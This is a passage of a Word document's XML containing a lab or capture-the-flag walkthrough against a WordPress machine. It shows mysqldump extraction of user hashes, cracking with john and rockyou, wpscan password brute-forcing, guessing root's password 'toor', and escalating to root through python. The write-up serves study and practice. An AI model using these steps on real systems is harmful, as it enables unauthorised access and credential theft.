          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Looks like we got another 2 for 1 bonus! we have achieved our goal with only use of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>wpscan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>my</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>sqldump</w:t>
      </w:r>
      <w:r>
        <w:t>. The last four of which are standard on most linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B3EA0" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bonus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657E4847" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Users and passwords via mysql database and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dump usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7C8ED" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and a search for users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D3EC9D" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mysqldump -u root -p --skip-extended-insert wordpress | grep --color=auto user*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="539C166C" wp14:editId="2615190F">
            <wp:extent cx="5334000" cy="9373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ql_dump_user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90593" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alternatively you could search through the database as follows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126F168A" wp14:editId="4AC0678D">
            <wp:extent cx="4887045" cy="223605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ql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25167A2" wp14:editId="1801A2C5">
            <wp:extent cx="1590594" cy="157522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ql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594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1CE2F25" wp14:editId="2DF34E2C">
            <wp:extent cx="1590594" cy="253573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ql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594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A0ABC82" wp14:editId="38EEAEDA">
            <wp:extent cx="5334000" cy="106488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ql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C79745" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The following command is a nice way to export information out of tables and into a file without the us</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e of any other tools </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B6C30D" wp14:editId="7965AC1A">
            <wp:extent cx="5334000" cy="2004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ql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2F4C1" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crack password hashes with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58745CEA" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you extracted the usernames and hashes with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then you can move the new file to the Kali machine via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D5DD2" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>scp michael@192.168.1.110:/home/michael/users ./</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C884E3E" wp14:editId="242E7079">
            <wp:extent cx="5334000" cy="737419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john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4E87B" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Next use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>john</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to crack the passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09776A17" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>john -wordlist:/usr/share/wordlist/rockyou.txt users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="249DA488" wp14:editId="4EBDAF53">
            <wp:extent cx="5334000" cy="148932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john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DFBECA6" wp14:editId="24B292EB">
            <wp:extent cx="2020900" cy="61472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john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DAFB3" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">steven’s password is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pink84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BA3A7A" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find Steven’s password with wpscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776202A1" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>wpscan --url 192.168.1.110/wordpress -U steven -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>P /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71BB0973" wp14:editId="2F6676F1">
            <wp:extent cx="5334000" cy="52769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wpscan0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BD00E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gain Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E395C6A" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Through Michael</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B123E" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Since we already know this machine has week passwords on it I tried guessing a couple common root passwords and was able to get in with the password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>toor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EDC044" wp14:editId="23F59379">
            <wp:extent cx="1844168" cy="39188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ichael_roo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168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7B627" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Since we now know root’s password we </w:t>
      </w:r>
      <w:r>
        <w:t>could also use this to SSH directly into the root account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3EA01" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Through Steven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E252186" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After finding Stevens login we can SSH into the machine with his credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1183E095" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We can see that Steven does not have a full shell to utilize but he does have python permissions. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F27473A" wp14:editId="40E42D60">
            <wp:extent cx="5334000" cy="1618249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sh_steven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B71E0" w14:textId="77777777" w:rsidR="003F08F3" w:rsidRDefault="00282572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We ca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">n use python to start a shell, and if we do it with root privileges we will be escalated to root in the newly spawned shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CAD8349" wp14:editId="77923EF7">
            <wp:extent cx="3242662" cy="24588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even_python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3"/>
    </w:p>
    <w:sectPr w:rsidR="003F08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B60F2" w14:textId="77777777" w:rsidR="00282572" w:rsidRDefault="00282572">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6058B631" w14:textId="77777777" w:rsidR="00282572" w:rsidRDefault="00282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42587" w14:textId="77777777" w:rsidR="00282572" w:rsidRDefault="00282572">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="64E03183" w14:textId="77777777" w:rsidR="00282572" w:rsidRDefault="00282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9492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203D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08F3"/>
    <w:rsid w:val="00282572"/>
    <w:rsid w:val="003F08F3"/>
    <w:rsid w:val="00A3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8DCE4"/>
  <w15:docId w15:val="{EB4A42F9-9EDB-4A51-8119-1E65BC7A8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641</Words>
  <Characters>3657</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>30</Lines>
  <Paragraphs>8</Paragraphs>
  <ScaleCrop>false</ScaleCrop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</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-02T02:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-02T02:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>